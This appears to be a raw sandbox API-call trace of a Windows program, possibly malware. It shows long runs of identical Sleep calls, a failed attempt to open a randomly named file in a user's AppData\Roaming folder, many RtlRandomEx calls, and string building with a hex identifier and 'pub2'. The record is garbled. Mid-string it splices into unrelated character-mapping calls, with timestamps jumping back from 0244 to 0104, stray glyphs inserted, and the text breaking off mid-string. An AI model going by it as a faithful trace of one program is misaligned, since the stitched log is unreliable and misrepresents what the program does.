Sleep (dwMilliseconds=0x258) [0237.935] Sleep (dwMilliseconds=0x258) [0237.949] Sleep (dwMilliseconds=0x258) [0238.011] Sleep (dwMilliseconds=0x258) [0238.076] Sleep (dwMilliseconds=0x258) [0238.104] Sleep (dwMilliseconds=0x258) [0238.104] Sleep (dwMilliseconds=0x258) [0238.120] Sleep (dwMilliseconds=0x258) [0238.136] Sleep (dwMilliseconds=0x258) [0238.153] Sleep (dwMilliseconds=0x258) [0238.169] Sleep (dwMilliseconds=0x258) [0238.230] Sleep (dwMilliseconds=0x258) [0238.278] Sleep (dwMilliseconds=0x258) [0238.298] Sleep (dwMilliseconds=0x258) [0238.307] Sleep (dwMilliseconds=0x258) [0238.324] Sleep (dwMilliseconds=0x258) [0238.339] Sleep (dwMilliseconds=0x258) [0238.355] Sleep (dwMilliseconds=0x258) [0238.370] Sleep (dwMilliseconds=0x258) [0238.432] Sleep (dwMilliseconds=0x258) [0238.479] Sleep (dwMilliseconds=0x258) [0238.501] Sleep (dwMilliseconds=0x258) [0238.510] Sleep (dwMilliseconds=0x258) [0238.526] Sleep (dwMilliseconds=0x258) [0238.542] Sleep (dwMilliseconds=0x258) [0238.557] Sleep (dwMilliseconds=0x258) [0238.573] Sleep (dwMilliseconds=0x258) [0238.589] Sleep (dwMilliseconds=0x258) [0238.651] Sleep (dwMilliseconds=0x258) [0238.698] Sleep (dwMilliseconds=0x258) [0238.713] Sleep (dwMilliseconds=0x258) [0238.729] Sleep (dwMilliseconds=0x258) [0238.745] Sleep (dwMilliseconds=0x258) [0238.765] Sleep (dwMilliseconds=0x258) [0238.776] Sleep (dwMilliseconds=0x258) [0238.791] Sleep (dwMilliseconds=0x258) [0238.854] Sleep (dwMilliseconds=0x258) [0238.905] Sleep (dwMilliseconds=0x258) [0238.973] Sleep (dwMilliseconds=0x258) [0238.978] Sleep (dwMilliseconds=0x258) [0238.997] Sleep (dwMilliseconds=0x258) [0239.010] Sleep (dwMilliseconds=0x258) [0239.026] Sleep (dwMilliseconds=0x258) [0239.065] Sleep (dwMilliseconds=0x258) [0239.103] Sleep (dwMilliseconds=0x258) [0239.151] Sleep (dwMilliseconds=0x258) [0239.174] Sleep (dwMilliseconds=0x258) [0239.181] Sleep (dwMilliseconds=0x258) [0239.197] Sleep (dwMilliseconds=0x258) [0239.212] Sleep (dwMilliseconds=0x258) [0239.228] Sleep (dwMilliseconds=0x258) [0239.244] Sleep (dwMilliseconds=0x258) [0239.260] Sleep (dwMilliseconds=0x258) [0239.321] Sleep (dwMilliseconds=0x258) [0239.369] Sleep (dwMilliseconds=0x258) [0239.385] Sleep (dwMilliseconds=0x258) [0239.400] Sleep (dwMilliseconds=0x258) [0239.416] Sleep (dwMilliseconds=0x258) [0239.431] Sleep (dwMilliseconds=0x258) [0239.446] Sleep (dwMilliseconds=0x258) [0239.462] Sleep (dwMilliseconds=0x258) [0239.526] Sleep (dwMilliseconds=0x258) [0239.571] Sleep (dwMilliseconds=0x258) [0239.597] Sleep (dwMilliseconds=0x258) [0239.602] Sleep (dwMilliseconds=0x258) [0239.618] Sleep (dwMilliseconds=0x258) [0239.634] Sleep (dwMilliseconds=0x258) [0239.649] Sleep (dwMilliseconds=0x258) [0239.665] Sleep (dwMilliseconds=0x258) [0239.680] Sleep (dwMilliseconds=0x258) [0239.743] Sleep (dwMilliseconds=0x258) [0239.790] Sleep (dwMilliseconds=0x258) [0239.812] Sleep (dwMilliseconds=0x258) [0239.821] Sleep (dwMilliseconds=0x258) [0239.836] Sleep (dwMilliseconds=0x258) [0239.853] Sleep (dwMilliseconds=0x258) [0239.868] Sleep (dwMilliseconds=0x258) [0239.883] Sleep (dwMilliseconds=0x258) [0239.945] Sleep (dwMilliseconds=0x258) [0239.993] Sleep (dwMilliseconds=0x258) [0240.018] Sleep (dwMilliseconds=0x258) [0240.023] Sleep (dwMilliseconds=0x258) [0240.064] Sleep (dwMilliseconds=0x258) [0240.070] Sleep (dwMilliseconds=0x258) [0240.086] Sleep (dwMilliseconds=0x258) [0240.148] Sleep (dwMilliseconds=0x258) [0240.195] Sleep (dwMilliseconds=0x258) [0240.211] Sleep (dwMilliseconds=0x258) [0240.226] Sleep (dwMilliseconds=0x258) [0240.243] Sleep (dwMilliseconds=0x258) [0240.257] Sleep (dwMilliseconds=0x258) [0240.273] Sleep (dwMilliseconds=0x258) [0240.290] Sleep (dwMilliseconds=0x258) [0240.351] Sleep (dwMilliseconds=0x258) [0240.399] Sleep (dwMilliseconds=0x258) [0240.435] Sleep (dwMilliseconds=0x258) [0240.445] Sleep (dwMilliseconds=0x258) [0240.460] Sleep (dwMilliseconds=0x258) [0240.476] Sleep (dwMilliseconds=0x258) [0240.492] Sleep (dwMilliseconds=0x258) [0240.508] Sleep (dwMilliseconds=0x258) [0240.569] Sleep (dwMilliseconds=0x258) [0240.617] Sleep (dwMilliseconds=0x258) [0240.654] Sleep (dwMilliseconds=0x258) [0240.665] Sleep (dwMilliseconds=0x258) [0240.679] Sleep (dwMilliseconds=0x258) [0240.694] Sleep (dwMilliseconds=0x258) [0240.710] Sleep (dwMilliseconds=0x258) [0240.727] Sleep (dwMilliseconds=0x258) [0240.790] Sleep (dwMilliseconds=0x258) [0240.836] Sleep (dwMilliseconds=0x258) [0240.882] Sleep (dwMilliseconds=0x258) [0240.898] Sleep (dwMilliseconds=0x258) [0240.913] Sleep (dwMilliseconds=0x258) [0240.928] Sleep (dwMilliseconds=0x258) [0240.945] Sleep (dwMilliseconds=0x258) [0241.006] Sleep (dwMilliseconds=0x258) [0241.069] Sleep (dwMilliseconds=0x258) [0241.102] Sleep (dwMilliseconds=0x258) [0241.116] Sleep (dwMilliseconds=0x258) [0241.131] Sleep (dwMilliseconds=0x258) [0241.147] Sleep (dwMilliseconds=0x258) [0241.162] Sleep (dwMilliseconds=0x258) [0241.225] Sleep (dwMilliseconds=0x258) [0241.272] Sleep (dwMilliseconds=0x258) [0241.306] Sleep (dwMilliseconds=0x258) [0241.318] Sleep (dwMilliseconds=0x258) [0241.334] Sleep (dwMilliseconds=0x258) [0241.349] Sleep (dwMilliseconds=0x258) [0241.366] Sleep (dwMilliseconds=0x258) [0241.381] Sleep (dwMilliseconds=0x258) [0241.443] Sleep (dwMilliseconds=0x258) [0241.490] Sleep (dwMilliseconds=0x258) [0241.534] Sleep (dwMilliseconds=0x258) [0241.537] Sleep (dwMilliseconds=0x258) [0241.554] Sleep (dwMilliseconds=0x258) [0241.568] Sleep (dwMilliseconds=0x258) [0241.583] Sleep (dwMilliseconds=0x258) [0241.599] Sleep (dwMilliseconds=0x258) [0241.661] Sleep (dwMilliseconds=0x258) [0241.708] Sleep (dwMilliseconds=0x258) [0241.743] Sleep (dwMilliseconds=0x258) [0241.755] Sleep (dwMilliseconds=0x258) [0241.771] Sleep (dwMilliseconds=0x258) [0241.786] Sleep (dwMilliseconds=0x258) [0241.802] Sleep (dwMilliseconds=0x258) [0241.818] Sleep (dwMilliseconds=0x258) [0241.880] Sleep (dwMilliseconds=0x258) [0241.927] Sleep (dwMilliseconds=0x258) [0241.961] Sleep (dwMilliseconds=0x258) [0241.974] Sleep (dwMilliseconds=0x258) [0241.989] Sleep (dwMilliseconds=0x258) [0242.005] Sleep (dwMilliseconds=0x258) [0242.020] Sleep (dwMilliseconds=0x258) [0242.036] Sleep (dwMilliseconds=0x258) [0242.114] Sleep (dwMilliseconds=0x258) [0242.161] Sleep (dwMilliseconds=0x258) [0242.179] Sleep (dwMilliseconds=0x258) [0242.192] Sleep (dwMilliseconds=0x258) [0242.208] Sleep (dwMilliseconds=0x258) [0242.224] Sleep (dwMilliseconds=0x258) [0242.239] Sleep (dwMilliseconds=0x258) [0242.255] Sleep (dwMilliseconds=0x258) [0242.317] Sleep (dwMilliseconds=0x258) [0242.364] Sleep (dwMilliseconds=0x258) [0242.379] Sleep (dwMilliseconds=0x258) [0242.395] Sleep (dwMilliseconds=0x258) [0242.410] Sleep (dwMilliseconds=0x258) [0242.428] Sleep (dwMilliseconds=0x258) [0242.442] Sleep (dwMilliseconds=0x258) [0242.457] Sleep (dwMilliseconds=0x258) [0242.520] Sleep (dwMilliseconds=0x258) [0242.568] Sleep (dwMilliseconds=0x258) [0242.606] Sleep (dwMilliseconds=0x258) [0242.613] Sleep (dwMilliseconds=0x258) [0242.629] Sleep (dwMilliseconds=0x258) [0242.644] Sleep (dwMilliseconds=0x258) [0242.660] Sleep (dwMilliseconds=0x258) [0242.724] Sleep (dwMilliseconds=0x258) [0242.769] Sleep (dwMilliseconds=0x258) [0242.809] Sleep (dwMilliseconds=0x258) [0242.816] Sleep (dwMilliseconds=0x258) [0242.832] Sleep (dwMilliseconds=0x258) [0242.847] Sleep (dwMilliseconds=0x258) [0242.863] Sleep (dwMilliseconds=0x258) [0242.878] Sleep (dwMilliseconds=0x258) [0242.941] Sleep (dwMilliseconds=0x258) [0242.988] Sleep (dwMilliseconds=0x258) [0243.015] Sleep (dwMilliseconds=0x258) [0243.023] Sleep (dwMilliseconds=0x258) [0243.035] Sleep (dwMilliseconds=0x258) [0243.067] Sleep (dwMilliseconds=0x258) [0243.081] Sleep (dwMilliseconds=0x258) [0243.097] Sleep (dwMilliseconds=0x258) [0243.159] Sleep (dwMilliseconds=0x258) [0243.206] Sleep (dwMilliseconds=0x258) [0243.240] Sleep (dwMilliseconds=0x258) [0243.253] Sleep (dwMilliseconds=0x258) [0243.268] Sleep (dwMilliseconds=0x258) [0243.284] Sleep (dwMilliseconds=0x258) [0243.300] Sleep (dwMilliseconds=0x258) [0243.315] Sleep (dwMilliseconds=0x258) [0243.378] Sleep (dwMilliseconds=0x258) [0243.425] Sleep (dwMilliseconds=0x258) [0243.472] Sleep (dwMilliseconds=0x258) [0243.487] Sleep (dwMilliseconds=0x258) [0243.505] Sleep (dwMilliseconds=0x258) [0243.518] Sleep (dwMilliseconds=0x258) [0243.534] Sleep (dwMilliseconds=0x258) [0243.596] Sleep (dwMilliseconds=0x258) [0243.643] Sleep (dwMilliseconds=0x258) [0243.693] Sleep (dwMilliseconds=0x258) [0243.705] Sleep (dwMilliseconds=0x258) [0243.721] Sleep (dwMilliseconds=0x258) [0243.737] Sleep (dwMilliseconds=0x258) [0243.752] Sleep (dwMilliseconds=0x258) [0243.767] Sleep (dwMilliseconds=0x258) [0243.830] Sleep (dwMilliseconds=0x258) [0243.895] Sleep (dwMilliseconds=0x258) [0243.942] Sleep (dwMilliseconds=0x258) [0243.955] Sleep (dwMilliseconds=0x258) [0243.971] Sleep (dwMilliseconds=0x258) [0243.986] Sleep (dwMilliseconds=0x258) [0244.004] Sleep (dwMilliseconds=0x258) [0244.095] Sleep (dwMilliseconds=0x258) [0244.142] Sleep (dwMilliseconds=0x258) [0244.184] Sleep (dwMilliseconds=0x258) [0244.189] Sleep (dwMilliseconds=0x258) [0244.204] Sleep (dwMilliseconds=0x258) [0244.220] Sleep (dwMilliseconds=0x258) [0244.237] Sleep (dwMilliseconds=0x258) [0244.252] Sleep (dwMilliseconds=0x258) [0244.313] Sleep (dwMilliseconds=0x258) [0244.360] Sleep (dwMilliseconds=0x258) [0244.376] Sleep (dwMilliseconds=0x258) [0244.393] Sleep (dwMilliseconds=0x258) [0244.407] Sleep (dwMilliseconds=0x258) [0244.423] Sleep (dwMilliseconds=0x258) [0244.439] Sleep (dwMilliseconds=0x258) [0244.455] Sleep (dwMilliseconds=0x258) [0244.516] Sleep (dwMilliseconds=0x258) [0244.565] Sleep (dwMilliseconds=0x258) [0244.598] Sleep (dwMilliseconds=0x258) [0244.611] Sleep (dwMilliseconds=0x258) [0244.626] Sleep (dwMilliseconds=0x258) [0244.641] Sleep (dwMilliseconds=0x258) [0244.658] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x26) returned 0x7f52300 [0244.658] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3b1d81ef [0244.661] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x5b) returned 0x7f523d0 [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2b921ba9 [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3975aa95 [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6097bb17 [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3ff0e1 [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x709a84a0 [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x36ced611 [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x610c7371 [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x18d277ef [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4f583238 [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x55abb2c7 [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x42e721ba [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2fca5991 [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6802fb02 [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xe898b0f [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2574f28a [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x38b79d31 [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x33b2360f [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x19817db5 [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x35f6e09c [0244.661] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7ed5128 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3ecbefd6 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x516ffe8b [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x21b4ab3c [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x25007f36 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6e415fb0 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x75d81089 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7a1b8f72 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4e43b764 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x38fe2fec [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x65b4b6fd [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x34a434c4 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x18f4ab8d [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2b7ca753 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x12d44ad1 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5a61e1e1 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1522ac74 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6bcc77c8 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6a5fceb6 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x441eba24 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4862f68f [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x11be2cb6 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x711a1357 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3587feb9 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x401e66a7 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3039f616 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x57a26355 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6761ea8b [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3fe24701 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2ec37152 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6d159104 [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6d449b9c [0244.662] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x31faedcf [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4761b051 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3610cde6 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x733d1243 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x538b2716 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1d45a994 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x761cb9e2 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5ded5835 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5313da83 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x765d61eb [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x116edbae [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x364207f9 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4903d2da [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x9211fa [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4181802e [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x758e46a6 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x457c213b [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xec1ec53 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x64e4fc7e [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7c5b472e [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3d06aab9 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x512d0ebc [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4c7449f4 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x594b21eb [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x77e81c99 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x60adb858 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2679effa [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4828b9c9 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x53fb7641 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x503bd576 [0244.663] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x20959249 [0244.663] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0xaa) returned 0x7f52440 [0244.664] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0244.664] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0244.664] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0244.664] lstrcatA (in: lpString1="", lpString2="X.(Bo,(doBc`M&G:L:aSy0uew61G),kXx`d=]%SR[DZ$[j$@OuGt&+T=I#T@B+\"W)e!l^m#n=k?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\灪∆) returned 256 [0104.872] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\灪∆, cchSrc=256, lpCharType=0x18fc34 | out: lpCharType=0x18fc34) returned 1 [0104.873] HeapValidate (hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81540) returned 1 [0104.873] HeapFree (in: hHeap=0xa80000, dwFlags=0x0, lpMem=0xa81540 | out: hHeap=0xa80000) returned 1 [0104.874] GetLastError () returned 0x0 [0104.874] SetLastError (dwErrCode=0x0) [0104.874] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0104.874] RtlAllocateHeap (HeapHandle=0xa80000, Flags=0x0, Size=0x22c) returned 0xa81540 [0104.875] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f92c, cbMultiByte=256, lpWideCharStr=0xa81568, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\灪∆) returned 256 [0104.875] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\灪∆, cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0105.046] RtlAllocateHeap (HeapHandle=0xa80000, Flags=0x0, Size=0x22c) returned 0xa81778 [0105.048] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\狝煪䀌ꠕ∀, cchSrc=256, lpDestStr=0xa817a0, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\䳝灪∆) returned 256 [0105.048] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ﷽﷽\\\䳝灪∆, cchWideChar=256, lpMultiByteStr=0x18fb34, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ 